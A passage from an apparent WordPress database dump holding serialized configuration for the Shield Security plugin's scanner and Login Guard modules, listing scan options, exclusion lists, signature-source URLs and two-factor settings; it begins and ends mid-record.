Disabled\";}i:1;a:2:{s:9:\"value_key\";s:13:\"enabled_email\";s:4:\"text\";s:38:\"Scan Enabled - Send Email Notification\";}i:2;a:2:{s:9:\"value_key\";s:16:\"enabled_no_email\";s:4:\"text\";s:36:\"Scan Enabled - No Email Notification\";}}s:9:\"link_info\";s:18:\"https://icwp.io/du\";s:9:\"link_blog\";s:18:\"https://icwp.io/ah\";s:4:\"name\";s:21:\"Vulnerability Scanner\";s:7:\"summary\";s:32:\"Enable The Vulnerability Scanner\";s:11:\"description\";s:66:\"Scan all your WordPress assets for known security vulnerabilities.\";}i:3;a:10:{s:3:\"key\";s:22:\"wpvuln_scan_autoupdate\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Automatic Updates\";s:7:\"summary\";s:49:\"Apply Updates Automatically To Vulnerable Plugins\";s:11:\"description\";s:98:\"When an update becomes available, automatically apply updates to items with known vulnerabilities.\";}i:4;a:11:{s:3:\"key\";s:19:\"wpvuln_scan_display\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"default\";s:13:\"enabled_admin\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:16:\"Display Disabled\";}i:1;a:2:{s:9:\"value_key\";s:13:\"enabled_admin\";s:4:\"text\";s:15:\"Display Enabled\";}i:2;a:2:{s:9:\"value_key\";s:21:\"enabled_securityadmin\";s:4:\"text\";s:32:\"Display Only For Security Admins\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Highlight Plugins\";s:7:\"summary\";s:28:\"Highlight Vulnerable Plugins\";s:11:\"description\";s:64:\"Vulnerable plugins will be highlighted on the main plugins page.\";}i:5;a:10:{s:3:\"key\";s:16:\"enabled_scan_apc\";s:7:\"section\";s:16:\"section_scan_apc\";s:7:\"default\";s:13:\"enabled_email\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:13:\"enabled_email\";s:4:\"text\";s:38:\"Scan Enabled - Send Email Notification\";}i:2;a:2:{s:9:\"value_key\";s:16:\"enabled_no_email\";s:4:\"text\";s:36:\"Scan Enabled - No Email Notification\";}}s:9:\"link_info\";s:18:\"https://icwp.io/ew\";s:9:\"link_blog\";s:18:\"https://icwp.io/eo\";s:4:\"name\";s:24:\"Abandoned Plugin Scanner\";s:7:\"summary\";s:35:\"Enable The Abandoned Plugin Scanner\";s:11:\"description\";s:66:\"Scan your WordPress.org assets for whether they\'ve been abandoned.\";}i:6;a:9:{s:3:\"key\";s:31:\"enable_core_file_integrity_scan\";s:7:\"section\";s:16:\"section_scan_wcf\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:22:\"https://icwp.io/wpsf36\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf37\";s:4:\"name\";s:20:\"WP Core File Scanner\";s:7:\"summary\";s:56:\"Automatically Scans WordPress Core Files For Alterations\";s:11:\"description\";s:145:\"Compares all WordPress core files on your site against the official WordPress files. WordPress Core files should never be altered for any reason.\";}i:7;a:9:{s:3:\"key\";s:24:\"attempt_auto_file_repair\";s:7:\"section\";s:16:\"section_scan_wcf\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:22:\"https://icwp.io/wpsf36\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf37\";s:4:\"name\";s:11:\"Auto Repair\";s:7:\"summary\";s:64:\"Automatically Repair WordPress Core Files That Have Been Altered\";s:11:\"description\";s:141:\"Attempts to automatically repair WordPress Core files with the official WordPress file data, for files that have been altered or are missing.\";}i:8;a:11:{s:3:\"key\";s:14:\"scan_frequency\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:7:\"default\";i:1;s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:8:{i:0;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Once\";}i:1;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:24:\"Twice (scan every 12hrs)\";}i:2;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:25:\"3 Times (scan every 8hrs)\";}i:3;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:25:\"4 Times (scan every 6hrs)\";}i:4;a:2:{s:9:\"value_key\";s:1:\"6\";s:4:\"text\";s:25:\"6 Times (scan every 4hrs)\";}i:5;a:2:{s:9:\"value_key\";s:1:\"8\";s:4:\"text\";s:25:\"8 Times (scan every 3hrs)\";}i:6;a:2:{s:9:\"value_key\";s:2:\"12\";s:4:\"text\";s:26:\"12 Times (scan every 2hrs)\";}i:7;a:2:{s:9:\"value_key\";s:2:\"24\";s:4:\"text\";s:26:\"24 Times (scan every hour)\";}}s:9:\"link_info\";s:18:\"https://icwp.io/b2\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Scan Frequency\";s:7:\"summary\";s:60:\"Number Of Times To Automatically Scan Core Files In 24 Hours\";s:11:\"description\";s:85:\"Default: Once every 24hrs. To improve security, increase the number of scans per day.\";}i:9;a:11:{s:3:\"key\";s:21:\"notification_interval\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"7\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Repeat Notifications\";s:7:\"summary\";s:46:\"Item Repeat Notifications Suppression Interval\";s:11:\"description\";s:87:\"How long the automated scans should wait before repeating a notification about an item.\";}i:10;a:10:{s:3:\"key\";s:16:\"email_files_list\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Email Files List\";s:7:\"summary\";s:61:\"Scan Notification Emails Should Include Full Listing Of Files\";s:11:\"description\";s:78:\"Scanner notification emails will include a summary list of all affected files.\";}i:11;a:10:{s:3:\"key\";s:37:\"enable_unrecognised_file_cleaner_scan\";s:7:\"section\";s:16:\"section_scan_ufc\";s:7:\"default\";s:19:\"enabled_report_only\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:19:\"enabled_report_only\";s:4:\"text\";s:38:\"Scan Enabled - Send Email Notification\";}i:2;a:2:{s:9:\"value_key\";s:19:\"enabled_delete_only\";s:4:\"text\";s:41:\"Scan Enabled - Automatically Delete Files\";}i:3;a:2:{s:9:\"value_key\";s:21:\"enabled_delete_report\";s:4:\"text\";s:55:\"Scan Enabled - Delete Files and Send Email Notification\";}}s:9:\"link_info\";s:18:\"https://icwp.io/9y\";s:9:\"link_blog\";s:18:\"https://icwp.io/95\";s:4:\"name\";s:26:\"Unrecognised Files Scanner\";s:7:\"summary\";s:45:\"Scans Core Directories For Unrecognised Files\";s:11:\"description\";s:128:\"Scans for, and automatically deletes, any files in your core WordPress folders that are not part of your WordPress installation.\";}i:12;a:9:{s:3:\"key\";s:16:\"ufc_scan_uploads\";s:7:\"section\";s:16:\"section_scan_ufc\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/95\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Scan Uploads\";s:7:\"summary\";s:42:\"Scan Uploads Folder For PHP and Javascript\";s:11:\"description\";s:86:\"The Uploads folder is primarily for media, but could be used to store nefarious files.\";}i:13;a:9:{s:3:\"key\";s:14:\"ufc_exclusions\";s:7:\"section\";s:16:\"section_scan_ufc\";s:7:\"default\";a:8:{i:0;s:9:\"error_log\";i:1;s:9:\".htaccess\";i:2;s:9:\".htpasswd\";i:3;s:9:\".user.ini\";i:4;s:7:\"php.ini\";i:5;s:10:\"web.config\";i:6;s:12:\"php_mail.log\";i:7;s:8:\"mail.log\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:18:\"https://icwp.io/9z\";s:9:\"link_blog\";s:18:\"https://icwp.io/95\";s:4:\"name\";s:15:\"File Exclusions\";s:7:\"summary\";s:52:\"Provide A List Of Files To Be Excluded From The Scan\";s:11:\"description\";s:89:\"Take a new line for each file you wish to exclude from the scan. No commas are necessary.\";}i:14;a:9:{s:3:\"key\";s:10:\"ic_enabled\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Enable Integrity Checking Scan\";s:7:\"summary\";s:54:\"Scans For Critical Changes Made To Your WordPress Site\";s:11:\"description\";s:65:\"Detects changes made to your WordPress site outside of WordPress.\";}i:15;a:9:{s:3:\"key\";s:8:\"ic_users\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Monitor User Accounts\";s:7:\"summary\";s:48:\"Scans For Critical Changes Made To User Accounts\";s:11:\"description\";s:134:\"Detects changes made to critical user account information that were made directly on the database and outside of the WordPress system.\";}i:16;a:11:{s:3:\"key\";s:15:\"mal_scan_enable\";s:7:\"section\";s:16:\"section_scan_mal\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"enabled\";s:4:\"text\";s:22:\"Automatic Scan Enabled\";}}s:9:\"link_info\";s:18:\"https://icwp.io/fp\";s:9:\"link_blog\";s:18:\"https://icwp.io/fx\";s:4:\"name\";s:22:\"Automatic Malware Scan\";s:7:\"summary\";s:27:\"Enable Malware File Scanner\";s:11:\"description\";s:56:\"When enabled the Malware scanner will run automatically.\";}i:17;a:11:{s:3:\"key\";s:17:\"mal_fp_confidence\";s:7:\"section\";s:16:\"section_scan_mal\";s:7:\"premium\";b:1;s:7:\"default\";s:2:\"75\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:44:\"None - Turn Off Malware Intelligence Network\";}i:1;a:2:{s:9:\"value_key\";s:2:\"25\";s:4:\"text\";s:3:\"Low\";}i:2;a:2:{s:9:\"value_key\";s:2:\"50\";s:4:\"text\";s:6:\"Medium\";}i:3;a:2:{s:9:\"value_key\";s:2:\"75\";s:4:\"text\";s:4:\"High\";}i:4;a:2:{s:9:\"value_key\";s:3:\"100\";s:4:\"text\";s:4:\"Full\";}}s:9:\"link_info\";s:18:\"https://icwp.io/fp\";s:9:\"link_blog\";s:18:\"https://icwp.io/fz\";s:4:\"name\";s:22:\"Automatic Malware Scan\";s:7:\"summary\";s:27:\"Enable Malware File Scanner\";s:11:\"description\";s:56:\"When enabled the Malware scanner will run automatically.\";}i:18;a:10:{s:3:\"key\";s:19:\"mal_autorepair_core\";s:7:\"section\";s:16:\"section_scan_mal\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Auto-Repair WP Core\";s:7:\"summary\";s:41:\"Automatically Repair WordPress Core Files\";s:11:\"description\";s:71:\"Automatically reinstall any core files found to have potential malware.\";}i:19;a:10:{s:3:\"key\";s:22:\"mal_autorepair_plugins\";s:7:\"section\";s:16:\"section_scan_mal\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Auto-Repair WP Plugins\";s:7:\"summary\";s:42:\"Automatically Repair WordPress.org Plugins\";s:11:\"description\";s:70:\"Automatically repair any plugin files found to have potential malware.\";}i:20;a:10:{s:3:\"key\";s:23:\"mal_autorepair_surgical\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Surgical Auto-Repair\";s:7:\"summary\";s:55:\"Automatically Attempt To Surgically Remove Malware Code\";s:11:\"description\";s:58:\"Attempts to automatically remove code from infected files.\";}i:21;a:11:{s:3:\"key\";s:10:\"ptg_enable\";s:7:\"section\";s:16:\"section_scan_ptg\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:13:\"Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"enabled\";s:4:\"text\";s:12:\"Scan Enabled\";}}s:9:\"link_info\";s:18:\"https://icwp.io/bl\";s:9:\"link_blog\";s:18:\"https://icwp.io/bm\";s:4:\"name\";s:20:\"Enable/Disable Guard\";s:7:\"summary\";s:43:\"Enable The Guard For Plugin And Theme Files\";s:11:\"description\";s:90:\"When enabled the Guard will automatically scan for changes to your Plugin and Theme files.\";}i:22;a:11:{s:3:\"key\";s:9:\"ptg_depth\";s:7:\"section\";s:16:\"section_scan_ptg\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:1;s:3:\"min\";i:0;s:9:\"link_info\";s:18:\"https://icwp.io/bn\";s:9:\"link_blog\";s:18:\"https://icwp.io/bm\";s:4:\"name\";s:16:\"Guard/Scan Depth\";s:7:\"summary\";s:54:\"How Deep Into The Plugin Directories To Scan And Guard\";s:11:\"description\";s:110:\"The Guard normally operates scan only the top level of a plugin folder. Increasing depth increases scan times.\";}i:23;a:10:{s:3:\"key\";s:14:\"ptg_extensions\";s:7:\"section\";s:16:\"section_scan_ptg\";s:7:\"premium\";b:1;s:7:\"default\";a:5:{i:0;s:3:\"php\";i:1;s:4:\"php5\";i:2;s:2:\"js\";i:3;s:3:\"svg\";i:4;s:8:\"htaccess\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:18:\"https://icwp.io/bo\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"File Types\";s:7:\"summary\";s:35:\"The File Types Included In The Scan\";s:11:\"description\";s:78:\"Take a new line for each file extension. No commas(,) or periods(.) necessary.\";}i:24;a:10:{s:3:\"key\";s:19:\"ptg_reinstall_links\";s:7:\"section\";s:16:\"section_scan_ptg\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:18:\"https://icwp.io/bp\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Show Re-Install Links\";s:7:\"summary\";s:33:\"Show Re-Install Links For Plugins\";s:11:\"description\";s:78:\"Show links to re-install plugins and offer re-install when activating plugins.\";}i:25;a:5:{s:3:\"key\";s:17:\"ptg_last_build_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:26;a:5:{s:3:\"key\";s:16:\"ptg_candiskwrite\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}i:27;a:5:{s:3:\"key\";s:19:\"ptg_candiskwrite_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";b:0;}i:28;a:6:{s:3:\"key\";s:14:\"snapshot_users\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:29;a:5:{s:3:\"key\";s:12:\"rebuild_self\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}i:30;a:5:{s:3:\"key\";s:23:\"ptg_update_store_format\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}i:31;a:5:{s:3:\"key\";s:14:\"rt_file_hashes\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:32;a:5:{s:3:\"key\";s:20:\"rt_file_backup_names\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:33;a:5:{s:3:\"key\";s:18:\"rt_can_write_files\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:34;a:5:{s:3:\"key\";s:14:\"scans_to_build\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:35;a:5:{s:3:\"key\";s:12:\"is_scan_cron\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}i:36;a:5:{s:3:\"key\";s:14:\"mal_fp_reports\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:19:{s:10:\"db_classes\";a:2:{s:11:\"scanresults\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Scanner\\Handler\";s:5:\"scanq\";s:68:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\ScanQueue\\Handler\";}s:14:\"all_scan_slugs\";a:6:{i:0;s:3:\"apc\";i:1;s:3:\"mal\";i:2;s:3:\"ptg\";i:3;s:3:\"wpv\";i:4;s:3:\"wcf\";i:5;s:3:\"ufc\";}s:18:\"table_name_scanner\";s:7:\"scanner\";s:21:\"table_columns_scanner\";a:9:{i:0;s:2:\"id\";i:1;s:4:\"hash\";i:2;s:4:\"meta\";i:3;s:4:\"scan\";i:4;s:8:\"severity\";i:5;s:10:\"ignored_at\";i:6;s:11:\"notified_at\";i:7;s:10:\"created_at\";i:8;s:10:\"deleted_at\";}s:20:\"table_name_scanqueue\";s:5:\"scanq\";s:23:\"table_columns_scanqueue\";a:9:{i:0;s:2:\"id\";i:1;s:4:\"scan\";i:2;s:5:\"items\";i:3;s:7:\"results\";i:4;s:4:\"meta\";i:5;s:10:\"started_at\";i:6;s:11:\"finished_at\";i:7;s:10:\"created_at\";i:8;s:10:\"deleted_at\";}s:19:\"url_mal_sigs_simple\";s:96:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_raw.txt\";s:18:\"url_mal_sigs_regex\";s:95:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_re.txt\";s:23:\"malware_whitelist_paths\";a:3:{i:0;s:18:\"wp-content/wflogs/\";i:1;s:17:\"wp-content/cache/\";i:2;s:25:\"wp-content/icwp/rollback/\";}s:14:\"cron_all_scans\";s:9:\"all-scans\";s:16:\"url_checksum_api\";s:45:\"https://api.wordpress.org/core/checksums/1.0/\";s:21:\"url_wordress_core_svn\";s:31:\"https://core.svn.wordpress.org/\";s:26:\"url_wordress_core_svn_il8n\";s:42:\"https://svn.automattic.com/wordpress-i18n/\";s:17:\"url_wp_hashes_api\";s:21:\"https://wphashes/api/\";s:21:\"wpvulndb_api_url_root\";s:28:\"https://wpvulndb.com/api/v2/\";s:14:\"wcf_exclusions\";a:5:{i:0;s:11:\"readme.html\";i:1;s:11:\"license.txt\";i:2;s:16:\"licens-sv_SE.txt\";i:3;s:20:\"wp-config-sample.php\";i:4;s:11:\"wp-content/\";}s:27:\"wcf_exclusions_missing_only\";a:2:{i:0;s:20:\"wp-admin/install.php\";i:1;s:10:\"xmlrpc.php\";}s:20:\"corechecksum_autofix\";a:3:{i:0;s:20:\"wp-content/index.php\";i:1;s:28:\"wp-content/plugins/index.php\";i:2;s:27:\"wp-content/themes/index.php\";}s:6:\"events\";a:30:{s:14:\"apc_alert_sent\";a:0:{}s:14:\"mal_alert_sent\";a:0:{}s:14:\"ptg_alert_sent\";a:0:{}s:14:\"ufc_alert_sent\";a:0:{}s:14:\"wcf_alert_sent\";a:0:{}s:14:\"wpv_alert_sent\";a:0:{}s:12:\"apc_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"mal_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"ptg_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"ufc_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"wcf_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"wpv_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:14:\"apc_scan_found\";a:2:{s:3:\"cat\";i:2;s:6:\"recent\";b:1;}s:14:\"mal_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"ptg_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"ufc_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"wcf_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"wpv_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:23:\"apc_item_repair_success\";a:0:{}s:20:\"apc_item_repair_fail\";a:0:{}s:23:\"mal_item_repair_success\";a:1:{s:6:\"recent\";b:1;}s:20:\"mal_item_repair_fail\";a:0:{}s:23:\"ptg_item_repair_success\";a:0:{}s:20:\"ptg_item_repair_fail\";a:0:{}s:23:\"ufc_item_repair_success\";a:1:{s:6:\"recent\";b:1;}s:20:\"ufc_item_repair_fail\";a:0:{}s:23:\"wcf_item_repair_success\";a:1:{s:6:\"recent\";b:1;}s:20:\"wcf_item_repair_fail\";a:0:{}s:23:\"wpv_item_repair_success\";a:0:{}s:20:\"wpv_item_repair_fail\";a:0:{}}}s:10:\"meta_modts\";i:1572181753;}'),(33629,1,'shield_mod_config_8c49bed970fd127c39089ba5d0f32248','a:7:{s:4:\"slug\";s:13:\"login_protect\";s:10:\"properties\";a:13:{s:4:\"slug\";s:13:\"login_protect\";s:4:\"name\";s:11:\"Login Guard\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"loginprotect\";s:7:\"tagline\";s:83:\"Block brute force attacks and secure user identities with Two-Factor Authentication\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:13:\"admin_notices\";a:1:{s:23:\"email-verification-sent\";a:4:{s:2:\"id\";s:23:\"email-verification-sent\";s:4:\"once\";b:0;s:4:\"type\";s:7:\"warning\";s:12:\"plugin_admin\";s:3:\"yes\";}}s:8:\"sections\";a:10:{i:0;a:5:{s:4:\"slug\";s:36:\"section_brute_force_login_protection\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Brute Force Login Guard\";s:11:\"title_short\";s:11:\"Brute Force\";s:7:\"summary\";a:2:{i:0;s:87:\"Purpose - Blocks brute force hacking attacks against your login and registration pages.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:4:{s:4:\"slug\";s:17:\"section_recaptcha\";s:5:\"title\";s:16:\"Google reCAPTCHA\";s:11:\"title_short\";s:9:\"reCAPTCHA\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Adds Google reCAPTCHA to the Login Forms.\";i:1;s:37:\"Recommendation - Keep this turned on.\";i:2;s:109:\"Note - You will need to register for Google reCAPTCHA keys and store them in the Shield \'Dashboard\' settings.\";}}i:2;a:4:{s:4:\"slug\";s:17:\"section_2fa_email\";s:5:\"title\";s:31:\"Email Two-Factor Authentication\";s:11:\"title_short\";s:11:\"2FA - Email\";s:7:\"summary\";a:3:{i:0;s:102:\"Purpose - Verifies the identity of users who log in to your site using email-based one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:3;a:4:{s:4:\"slug\";s:14:\"section_2fa_ga\";s:5:\"title\";s:46:\"Google Authenticator Two-Factor Authentication\";s:11:\"title_short\";s:26:\"2FA - Google Authenticator\";s:7:\"summary\";a:3:{i:0;s:111:\"Purpose - Verifies the identity of users who log in to your site using Google Authenticator one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:4;a:4:{s:4:\"slug\";s:30:\"section_yubikey_authentication\";s:5:\"title\";s:33:\"Yubikey Two-Factor Authentication\";s:11:\"title_short\";s:12:\"2FA -Yubikey\";s:7:\"summary\";a:2:{i:0;s:98:\"Purpose - Verifies the identity of users who log in to your site using Yubikey one-time-passwords.\";i:1;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:5;a:4:{s:4:\"slug\";s:34:\"section_multifactor_authentication\";s:5:\"title\";s:27:\"Multi-Factor Authentication\";s:11:\"title_short\";s:13:\"2-Factor Auth\";s:7:\"summary\";a:3:{i:0;s:103:\"Purpose - Verifies the identity of users who log in to your site - i.e. they are who they say they are.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:6;a:4:{s:4:\"slug\";s:22:\"section_rename_wplogin\";s:5:\"title\";s:18:\"Hide WP Login Page\";s:11:\"title_short\";s:15:\"Hide Login Page\";s:7:\"summary\";a:2:{i:0;s:142:\"Purpose - To hide your wp-login.php page from brute force attacks and hacking attempts - if your login page cannot be found, no-one can login.\";i:1;s:145:\"Recommendation - This is not required for complete security and if your site has irregular or inconsistent configuration it may not work for you.\";}}i:7;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:13:\"User Messages\";s:11:\"title_short\";s:13:\"User Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:8;a:4:{s:4:\"slug\";s:46:\"section_enable_plugin_feature_login_protection\";s:5:\"title\";s:26:\"Disable Login Guard Module\";s:11:\"title_short\";s:7:\"Disable\";s:7:\"summary\";a:2:{i:0;s:91:\"Purpose - Login Guard blocks all automated and brute force attempts to log in to your site.\";i:1;s:55:\"Recommendation - Keep the Login Guard module turned on.\";}}i:9;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:23:{i:0;a:9:{s:3:\"key\";s:20:\"enable_login_protect\";s:7:\"section\";s:46:\"section_enable_plugin_feature_login_protection\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/51\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf03\";s:4:\"name\";s:18:\"Enable Login Guard\";s:7:\"summary\";s:42:\"Enable (or Disable) The Login Guard Module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Login Guard module\";}i:1;a:10:{s:3:\"key\";s:19:\"rename_wplogin_path\";s:7:\"section\";s:22:\"section_rename_wplogin\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/5q\";s:9:\"link_blog\";s:18:\"https://icwp.io/5r\";s:4:\"name\";s:15:\"Hide Login Page\";s:7:\"summary\";s:31:\"Rename The WordPress Login Page\";s:11:\"description\";s:101:\"Creating a path here will disable your \'wp-login.php\'. Only letters and numbers are permitted: abc123\";}i:2;a:9:{s:3:\"key\";s:29:\"enable_chained_authentication\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/9r\";s:9:\"link_blog\";s:18:\"https://icwp.io/84\";s:4:\"name\";s:27:\"Multi-Factor Authentication\";s:7:\"summary\";s:41:\"Require All Active Authentication Factors\";s:11:\"description\";s:123:\"When 